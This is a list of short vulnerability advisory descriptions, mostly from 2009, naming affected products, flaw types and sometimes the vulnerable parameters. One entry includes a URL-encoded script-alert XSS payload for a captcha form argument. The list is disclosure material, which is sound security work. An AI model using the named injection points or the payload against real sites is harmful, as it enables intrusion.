Unspecified vulnerability in NFS / ONCplus B.11.31_06 and B.11.31_07 on HP HP-UX B.11.31 allows local users to cause a denial of service via unknown attack vectors.
Stack-based buffer overflow in rping in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53, when used with SNMP (aka HPOvNNM.HPOVSNMP) before 1.30.009 and MIB (aka HPOvNNM.HPOVMIB) before 1.30.009, allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Discovery &amp; Dependency Mapping Inventory (DDMI) 2.0.0 through 2.52, 7.50, and 7.51 on Windows allows remote attackers to access DDMI agents via unknown vectors.
SQL injection vulnerability in administration/index.php in chCounter 3.1.3 allows remote attackers to execute arbitrary SQL commands via the login_name parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
dig.php in GScripts.net DNS Tools allows remote attackers to execute arbitrary commands via shell metacharacters in the host parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the SCTP sockets implementation in Sun OpenSolaris snv_106 through snv_107 allows local users to cause a denial of service (panic) via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the com_media component for Joomla! 1.5.x through 1.5.9 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the LDAP dissector in Wireshark 0.99.2 through 1.0.6, when running on Windows, allows remote attackers to cause a denial of service (crash) via unknown attack vectors.
Unspecified vulnerability in Wireshark before 1.0.7 has unknown impact and attack vectors.
Frontend User Registration (sr_feuser_register) extension 2.5.20 and earlier for TYPO3 does not properly verify access rights, which allows remote authenticated users to obtain sensitive information such as passwords via unknown attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Web Help Desk 9.1.22 (evaluation version) allow remote attackers to inject arbitrary web script or HTML via the (1) Report Name, (2) Asset No., and (3) Full Name fields in a Models action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the RD-Autos (com_rdautos) component 1.5.7 for Joomla! allows remote attackers to execute arbitrary SQL commands via the makeid parameter in index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the virtual machine display function in VMware Workstation 6.5.1 and earlier; VMware Player 2.5.1 and earlier; VMware ACE 2.5.1 and earlier; VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 build 156745; VMware Fusion before 2.0.4 build 159196; VMware ESXi 3.5; and VMware ESX 3.0.2, 3.0.3, and 3.5 allows guest OS users to execute arbitrary code on the host OS via unknown vectors, a different vulnerability than CVE-2008-4916.
Unspecified vulnerability in the eClient in IBM DB2 Content Manager 8.4.1 before 8.4.1.1 has unknown impact and attack vectors.
** DISPUTED **
Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA); as used in gunzip, gzip, pack, pcat, and unpack 7.x before 7.0.1701.48, 8.x before 8.0.1969.62, and 9.x before 9.0.3790.2076; allow remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in futomi's CGI Cafe Access Analyzer CGI Professional Version 4.11.5 and earlier allows remote attackers to gain administrative privileges via unknown vectors.
Unspecified vulnerability in the server in IBM Tivoli Storage Manager (TSM) 5.3.x before 5.3.2 and 6.x before 6.1 has unknown impact and attack vectors related to the "admin command line."
Multiple stack-based buffer overflows in maptemplate.c in mapserv in MapServer 4.x before 4.10.4 and 5.x before 5.2.2 have unknown impact and remote attack vectors.
The Web Services Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 and 7.0 before 7.0.0.3 has an unspecified "security problem" in the XML digital-signature specification, which has unknown impact and attack vectors.
The JAX-RPC WS-Security runtime in the Web Services Security component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.23 and 7.0 before 7.0.0.3, when APAR PK41002 is installed, does not properly validate UsernameToken objects, which has unknown impact and attack vectors.
Unspecified vulnerability in vmci.sys in the Virtual Machine Communication Interface (VMCI) in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, and VMware Server 2.0.x before 2.0.1 build 156745 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in an ioctl in hcmon.sys in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, and VMware Server 1.0.x before 1.0.9 build 156507 and 2.0.x before 2.0.1 build 156745 allows local users to cause a denial of service via unknown vectors, a different vulnerability than CVE-2008-3761.
The Java Plug-in in Java SE Development Kit (JDK) and Java Runtime Environment (JRE) 6 Update 12 and earlier, and 5.0 Update 17 and earlier, allows remote attackers to trick a user into trusting a signed applet via unknown vectors that misrepresent the security warning dialog, related to a "Swing JLabel HTML parsing vulnerability," aka CR 6782871.
The Java Plug-in in Java SE Development Kit (JDK) and Java Runtime Environment (JRE) 6 Update 12, 11, and 10 does not properly parse crossdomain.xml files, which allows remote attackers to bypass intended access restrictions and connect to arbitrary sites via unknown vectors, aka CR 6798948.
Unspecified vulnerability in the Java Plug-in in Java SE Development Kit (JDK) and Java Runtime Environment (JRE) 5.0 Update 17 and earlier; 6 Update 12 and earlier; 1.4.2_19 and earlier; and 1.3.1_24 and earlier allows remote attackers to access files and execute arbitrary code via unknown vectors related to "deserializing applets," aka CR 6646860.
Unspecified vulnerability in the Virtual Machine in Java SE Development Kit (JDK) and Java Runtime Environment (JRE) 6 Update 12 and earlier allows remote attackers to access files and execute arbitrary code via unknown vectors related to "code generation."
Unspecified vulnerability in the LDAP implementation in Java SE Development Kit (JDK) and Java Runtime Environment (JRE) 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.1_24 and earlier; and 1.4.2_19 and earlier allows remote LDAP servers to execute arbitrary code via unknown vectors related to serialized data.
SQL injection vulnerability in index.php in Pixie CMS 1.01a allows remote attackers to execute arbitrary SQL commands via the x parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Adobe Acrobat Reader 9 before 9.1, 8 before 8.1.4, and 7 before 7.1.1 might allow remote attackers to trigger memory corruption and possibly execute arbitrary code via unknown attack vectors related to JBIG2, a different vulnerability than CVE-2009-0193 and CVE-2009-1061.
Unspecified vulnerability in Adobe Acrobat Reader 9 before 9.1, 8 before 8.1.4, and 7 before 7.1.1 might allow remote attackers to execute arbitrary code via unknown attack vectors related to JBIG2 and "input validation," a different vulnerability than CVE-2009-0193 and CVE-2009-1062.
Unspecified vulnerability in Apple Safari on Mac OS X 10.5.6 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Charlie Miller during a PWN2OWN competition at CanSecWest 2009.
Unspecified vulnerability in the web service in Sitecore CMS 5.3.1 rev. 071114 allows remote authenticated users to gain access to security databases, and obtain administrative and user credentials, via unknown vectors related to SOAP and XML requests.
Mozilla Firefox 3.0.7 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors related to the _moveToEdgeShift XUL tree method, which triggers garbage collection on objects that are still in use, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009.
Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009.
Unspecified vulnerability in Apple Safari on Mac OS X 10.5.6 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009.
Unspecified vulnerability in the Send by e-mail module in the "Printer, e-mail and PDF versions" module 5.x before 5.x-4.4 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to send unlimited spam messages via unknown vectors related to the flood control API.
Unspecified vulnerability in the Advanced Replication component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Network Foundation component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Network Authentication component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the BI Publisher component in Oracle Application Server 5.6.2, 10.1.3.2.1, 10.1.3.3.3, and 10.1.3.4 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2009-0994.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.05, and 10.2.04 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.19 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-1013.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.19 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-1014.
Unspecified vulnerability in the JRockit component in BEA Product Suite R27.6.2 and earlier, with SDK/JRE 1.4.2, JRE/JDK 5, and JRE/JDK 6, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Data Service Integrator (AquaLogic Data Services Platform) component in BEA Product Suite 10.3.0, 3.2, 3.0.1, and 3.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, and 9.0 allows remote attackers to affect integrity via unknown vectors related to "access to source code of web pages."
Unspecified vulnerability in Oracle BEA WebLogic Server 10.3, 10.0 Gold through MP1, 9.2 Gold through MP3, 9.1, 9.0, 8.1 Gold through SP6, and 7.0 Gold through SP7 allows remote attackers to gain privileges via unknown vectors.
Unspecified vulnerability in Oracle BEA WebLogic Portal 8.1 Gold through SP6 allows remote authenticated users to gain privileges via unknown vectors.
A vulnerability was found in capnsquarepants wordcraft up to 0.6. It has been classified as problematic. Affected is an unknown function of the file tag.php. The manipulation of the argument tag leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 0.7 is able to address this issue. The patch is identified as be23028633e8105de92f387036871c03f34d3124. It is recommended to upgrade the affected component. VDB-219714 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in dpup fittr-flickr. This issue affects some unknown processing of the file fittr-flickr/features/easy-exif.js of the component EXIF Preview Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier of the patch is 08875dd8a2e5d0d16568bb0d67cb4328062fccde. It is recommended to apply a patch to fix this issue. The identifier VDB-218297 was assigned to this vulnerability.
A vulnerability classified as problematic was found in jianlinwei cool-php-captcha up to 0.2. This vulnerability affects unknown code of the file example-form.php. The manipulation of the argument captcha with the input %3Cscript%3Ealert(1)%3C/script%3E leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.3 is able to address this issue. The name of the patch is c84fb6b153bebaf228feee0cbf50728d27ae3f80. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218296.
The Oracle Applications Framework component in Oracle E-Business Suite 12.0.6 and 11i10CU2 uses default passwords for unspecified "FND Applications Users (not DB users)," which has unknown impact and attack vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS - eBenefits component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9.18 and 9.0.8 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the BI Publisher component in Oracle Application Server 10.1.3.2.1, 10.1.3.3.3, and 10.1.3.4 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 12.0.6 and 11i10CU2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the BI Publisher component in Oracle Application Server 5.6.2, 10.1.3.2.1, 10.1.3.3.3, and 10.1.3.4 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2009-1017.
Unspecified vulnerability in the OPMN component in Oracle Application Server 10.1.2.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information was obtained from the April 2009 CPU.  Oracle has not commented on reliable researcher claims that this issue is a format string vulnerability that allows remote attackers to execute arbitrary code via format string specifiers in an HTTP POST URI, which are not properly handled when logging to opmn/logs/opmn.log.
Unspecified vulnerability in the Listener component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2009-1970.
Unspecified vulnerability in the BI Publisher component in Oracle Application Server 5.6.2, 10.1.3.2.1, and 10.1.3.3.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-0989.
Unspecified vulnerability in the BI Publisher component in Oracle Application Server 5.6.2, 10.1.3.2.1, and 10.1.3.3.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-0990.
Unspecified vulnerability in the Password Policy component in Oracle Database 11.1.0.6 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Upgrade component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Workspace Manager component in Oracle Database 10.2.0.4 and 11.1.0.6 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2009-0974 and CVE-2009-3407.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.19 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Resource Manager component in Oracle Database 9.2.0.8 and 9.2.0.8DV allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Workspace Manager component in Oracle Database 10.2.0.4 and 11.1.0.6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-0975.
Unspecified vulnerability in the Workspace Manager component in Oracle Database 10.2.0.4 and 11.1.0.6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-0978.
Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2009-0983 and CVE-2009-3407.
Unspecified vulnerability in the Cluster Ready Services component in Oracle Database 10.1.0.5 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Workspace Manager component in Oracle Database 11.1.0.6, 11.1.0.7, 10.2.0.3, 10.2.0.4, 10.1.0.5, 9.2.0.8, and 9.2.0.8DV allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Cross-site scripting (XSS) vulnerability in futomi's CGI Cafe Access Analyzer CGI Standard Version 3.8.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
PHP remote file inclusion vulnerability in includes/class_image.php in PHP Pro Bid 6.05, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the fileExtension parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Futomi's CGI Cafe MP Form Mail CGI eCommerce 1.3.0 and earlier, and CGI Professional 3.2.2 and earlier, allows remote attackers to gain administrative privileges via unknown attack vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders allow remote attackers to hijack the intranet connectivity of arbitrary users for requests that (1) print documents via unknown vectors, (2) modify the network configuration via a NetIPChange request to hp/device/config_result_YesNo.html/config, or (3) change the password via the Password and ConfirmPassword parameters to hp/device/set_config_password.html/config.
Tor before 0.2.0.34 treats incomplete IPv4 addresses as valid, which has unknown impact and attack vectors related to "Spec conformance," as demonstrated using 192.168.0.
Unspecified vulnerability in Tor before 0.2.0.34 allows directory mirrors to cause a denial of service via unknown vectors.
Cross-site scripting (XSS) vulnerability in ejabberd before 2.0.4 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to links and MUC logs.
Directory traversal vulnerability in the media manager in Nucleus CMS before 3.40 allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in the UFS filesystem functionality in Sun OpenSolaris snv_86 through snv_91, when running in 32-bit mode on x86 systems, allows local users to cause a denial of service (panic) via unknown vectors related to the (1) ufs_getpage and (2) ufs_putapage routines, aka CR 6679732.
Unspecified vulnerability in Sun Solaris 10 on SPARC sun4v systems, and OpenSolaris snv_47 through snv_85, allows local users to cause a denial of service (hang of UFS filesystem write) via unknown vectors related to the (1) ufs_getpage and (2) ufs_putapage routines, aka CR 6425723.
Unspecified vulnerability in Sun OpenSolaris snv_39 through snv_45, when running in 64-bit mode on x86 architectures, allows local users to cause a denial of service (hang of UFS filesystem write) via unknown vectors related to the (1) ufs_getpage and (2) ufs_putapage routines, aka CR 6442712.
Unspecified vulnerability in Kerberos Incremental Propagation in Solaris 10 and OpenSolaris snv_01 through snv_110 allows remote attackers to cause a denial of service (loss of incremental propagation requests to slave KDC servers) via unknown vectors related to the master Key Distribution Center (KDC) server.
Unspecified vulnerability in Opera before 9.64 has unknown impact and attack vectors, related to a "moderately severe issue."
Unspecified vulnerability in the keysock kernel module in Solaris 10 and OpenSolaris builds snv_01 through snv_108 allows local users to cause a denial of service (system panic) via unknown vectors related to PF_KEY socket, probably related to setting socket options.
The Service Component Architecture (SCA) feature pack for IBM WebSphere Application Server (WAS) SCA 1.0 before 1.0.0.3 allows remote authenticated users to bypass intended authentication.transport access restrictions and obtain unspecified access via unknown vectors.
Heap-based buffer underflow in the readPostBody function in cgiutil.c in mapserv in MapServer 4.x before 4.10.4 and 5.x before 5.2.2 allows remote attackers to have an unknown impact via a negative value in the Content-Length HTTP header.
Cross-site scripting (XSS) vulnerability in QuoteBook allows remote attackers to inject arbitrary web script or HTML via the (1) QuoteName and (2) QuoteText parameters to quotesadd.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in QuoteBook allow remote attackers to execute arbitrary SQL commands via the (1) MyBox and (2) selectFavorites parameters to (a) quotes.php and the (3) QuoteName and (4) QuoteText parameters to (b) quotesadd.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in OpenGoo before 1.2.1 allows remote authenticated users to modify their own permissions via unknown attack vectors.
Race condition in the SystemTap stap tool 0.0.20080705 and 0.0.20090314 allows local users in the stapusr group to insert arbitrary SystemTap kernel modules and gain privileges via unknown vectors.
Directory traversal vulnerability in default.php in Kipper 2.01 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the configfile parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Kipper 2.01 allow remote attackers to inject arbitrary web script or HTML via the charm parameter to (1) index.php and (2) kipper.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in ScriptsEz Ez PHP Comment allows remote attackers to inject arbitrary web script or HTML via the name parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Movable Type Pro and Community Solution 4.x before 4.24 has unknown impact and attack vectors, possibly related to the password recovery mechanism.
Downloadcenter 2.1 stores common.h under the web root with insufficient access control, which allows remote attackers to obtain user credentials and other sensitive information via a direct request. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple directory traversal vulnerabilities in Page Engine CMS 2.0 Basic and Pro allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the fPrefix parameter to (1) modules/recent_poll_include.php, (2) modules/login_include.php, and (3) modules/statistics_include.php and (4) configuration.inc.php in includes/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Easy Login in the Sender module in HP Remote Graphics Software (RGS) 4.0.0 through 5.2.4 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in useradd in HP HP-UX B.11.11, B.11.23, and B.11.31 allows local users to access arbitrary files and directories via unknown vectors, a different issue than CVE-2008-1660.
Unspecified vulnerability in HP StorageWorks Storage Mirroring 5 before 5.1.1.1090.15 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP StorageWorks Storage Mirroring 5 before 5.1.1.1090.15 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP StorageWorks Storage Mirroring 5 before 5.1.1.1090.15 allows remote attackers to cause a denial of service or obtain "access" via unknown vectors.
Unspecified vulnerability in Secure NaviCLI in HP Storage Essentials 6.0.2 through 6.0.4 allows remote authenticated users to obtain "access" or "extended privileges" via unknown vectors.
Unspecified vulnerability in WMI Mapper for HP Systems Insight Manager before 2.5.2.0 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in WMI Mapper for HP Systems Insight Manager before 2.5.2.0 allows local users to gain privileges via unknown vectors.
filter.php in PHPFootball 1.6 and earlier allows remote attackers to retrieve password hashes via a request with an Accounts value for the dbtable parameter, in conjunction with a Password value for the dbfield parameter.  NOTE: this has been reported as a SQL injection vulnerability by some sources, but the provenance of that information is unknown.
Multiple cross-site scripting (XSS) vulnerabilities in PHPFootball 1.6 allow remote attackers to inject arbitrary web script or HTML via (1) the user parameter to login.php or (2) the dbfield parameter to filter.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in login.php in PHPFootball 1.6 allows remote attackers to execute arbitrary SQL commands via the user parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site request forgery (CSRF) vulnerabilities in SemanticScuttle before 0.91 allow remote attackers to (1) hijack the authentication of administrators via unknown vectors or (2) hijack the authentication of arbitrary users via vectors involving the profile page.
Stack-based buffer overflow in the GetStatsFromLine function in TPTEST 3.1.7 allows remote attackers to have an unknown impact via a STATS line with a long email field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Veritas network daemon (aka vnetd) in Symantec Veritas NetBackup Server / Enterprise Server 5.x, 6.0 before MP7 SP1, and 6.5 before 6.5.3.1 allows remote attackers to execute arbitrary code via unknown vectors related to "initial communications setup."
msnmsgr.exe in Windows Live Messenger (WLM) 2009 build 14.0.8064.206, and other 14.0.8064.x builds, allows remote attackers to cause a denial of service (application crash) via a modified header in a packet, as possibly demonstrated by a UTF-8.0 value of the charset field in the Content-Type header line.  NOTE: this has been reported as a format string vulnerability by some sources, but the provenance of that information is unknown.
Multiple static code injection vulnerabilities in post.php in Simple PHP News 1.0 final allow remote attackers to inject arbitrary PHP code into news.txt via the (1) title or (2) date parameter, and then execute the code via a direct request to display.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple integer overflows in malloc_leak.c in Bionic in Open Handset Alliance Android 1.0 have unknown impact and attack vectors, related to the (1) chk_calloc and (2) leak_calloc functions.
Cross-site scripting (XSS) vulnerability in password.php in Scripts for Sites EZ Reminder allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving the u2 parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in password.php in Scripts For Sites (SFS) EZ Baby allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving the u2 parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the sajax_get_common_js function in php/Sajax.php in Sajax 0.12 allows remote attackers to inject arbitrary web script or HTML via the URL parameter, which is not properly handled when using browsers that do not URL-encode requests, such as Internet Explorer 6.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Servlet Engine/Web Container and JSP components in IBM WebSphere Application Server (WAS) 5.1.0, 5.1.1.19, 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.23, and 7.0 before 7.0.0.3 allow remote attackers to read arbitrary files contained in war files in (1) web-inf, (2) meta-inf, and unspecified other directories via unknown vectors, related to (a) web-based applications and (b) the administrative console.
Unspecified vulnerability in IBM WebSphere Application Server (WAS) 5.1 and 6.0.2 before 6.0.2.33 on z/OS, when CSIv2 Identity Assertion is enabled and Enterprise JavaBeans (EJB) interaction occurs between a WAS 6.1 instance and a WAS pre-6.1 instance, allows local users to have an unknown impact via vectors related to (1) use of the wrong subject and (2) multiple CBIND checks.
Unspecified vulnerability in the Calendar export feature in Moodle 1.8 before 1.8.8 and 1.9 before 1.9.4 allows attackers to obtain sensitive information and conduct "brute force attacks on user accounts" via unknown vectors.
Unspecified vulnerability in SimpleIrcBot before 1.0 Stable has unknown impact and attack vectors related to an "auth vulnerability."
Multiple SQL injection vulnerabilities in admin/admin_login.php in Online Grades 3.2.4 allow remote attackers to execute arbitrary SQL commands via the (1) uname or (2) pword parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in futomi's CGI Cafe Fulltext search CGI 1.1.2 allows remote attackers to gain administrative privileges via unknown vectors.
The (1) mod_ibm_ssl and (2) mod_cgid modules in IBM HTTP Server 6.0.x before 6.0.2.31 and 6.1.x before 6.1.0.19, as used in WebSphere Application Server (WAS), set incorrect permissions for AF_UNIX sockets, which has unknown impact and local attack vectors.
Unspecified vulnerability in IBM WebSphere Application Server (WAS) 5.1.x before 5.1.1.19, 6.0.x before 6.0.2.29, and 6.1.x before 6.1.0.19, when Web Server plug-in content buffering is enabled, allows attackers to cause a denial of service (daemon crash) via unknown vectors, related to a mishandling of client read failures in which clients receive many 500 HTTP error responses and backend servers are incorrectly labeled as down.
Array index error in the gst_qtp_trak_handler function in gst/qtdemux/qtdemux.c in GStreamer Plug-ins (aka gstreamer-plugins) 0.6.0 allows remote attackers to have an unknown impact via a crafted QuickTime media file.
Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.0.1 on z/OS allows attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in the Embedded Lights Out Manager (ELOM) on the Sun Fire X2100 M2 and X2200 M2 x86 platforms before SP/BMC firmware 3.20 allows remote attackers to obtain privileged ELOM login access or execute arbitrary Service Processor (SP) commands via unknown vectors, aka Bug ID 6648082, a different vulnerability than CVE-2007-5717.
Unspecified vulnerability in the Embedded Lights Out Manager (ELOM) on the Sun Fire X2100 M2 and X2200 M2 x86 platforms before SP/BMC firmware 3.20 allows remote attackers to obtain privileged ELOM login access or execute arbitrary Service Processor (SP) commands via unknown vectors, aka Bug ID 6633175, a different vulnerability than CVE-2007-5717.
SQL injection vulnerability in index.asp in Katy Whitton BlogIt! allows remote attackers to execute arbitrary SQL commands via the (1) month and (2) year parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in login.php in Dark Age CMS 0.2c beta allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in SUSE blinux (aka sbl) in SUSE openSUSE 10.3 through 11.0 has unknown impact and attack vectors related to "incoming data and authentication-strings."
Unspecified vulnerability in the kernel in OpenSolaris snv_100 through snv_102 on the Sun UltraSPARC T2 and T2+ sun4v platforms allows local users to cause a denial of service (panic) via unknown vectors.
Static code injection vulnerability in admin.php in Ryneezy phoSheezy 0.2 allows remote authenticated administrators to inject arbitrary PHP code into config/header via the header parameter.  NOTE: this can be exploited by unauthenticated attackers by leveraging CVE-2009-0250. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in Novell GroupWise WebAccess 6.5x, 7.0, 7.01, 7.02x, 7.03, 7.03HP1a, and 8.0 allows remote attackers to insert e-mail forwarding rules, and modify unspecified other configuration settings, as arbitrary users via unknown vectors.
Stack-based buffer overflow in Triologic Media Player 8.0.0.0 allows user-assisted remote attackers to execute arbitrary code via a long string in a .m3l playlist file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in the Registry Setting Tool in Fujitsu SystemcastWizard Lite 2.0A, 2.0, 1.9, and earlier has unknown impact and attack vectors.
Insecure method vulnerability in Particle Software IntraLaunch Application Launcher ActiveX control in IntraLaunch.ocx, as used in LDRA TBbrowse and possibly other products, allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote authenticated users to gain privileges via unknown vectors, aka PD32022.
Unspecified vulnerability in the NETIO application in AREVA e-terrahabitat 5.7 and earlier allows remote attackers to cause a denial of service (system crash) via unknown vectors, aka PD32021.
Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote attackers to cause a denial of service (system crash) via unknown vectors, aka PD32020.
Unspecified vulnerability in the WebFGServer application in AREVA e-terrahabitat 5.7 and earlier allows remote attackers to cause a denial of service (system crash) via unknown vectors, aka PD32018.
Unspecified vulnerability in HP Virtual Rooms Client before 7.0.1, when running on Windows, allows remote attackers to execute arbitrary code via unknown vectors.
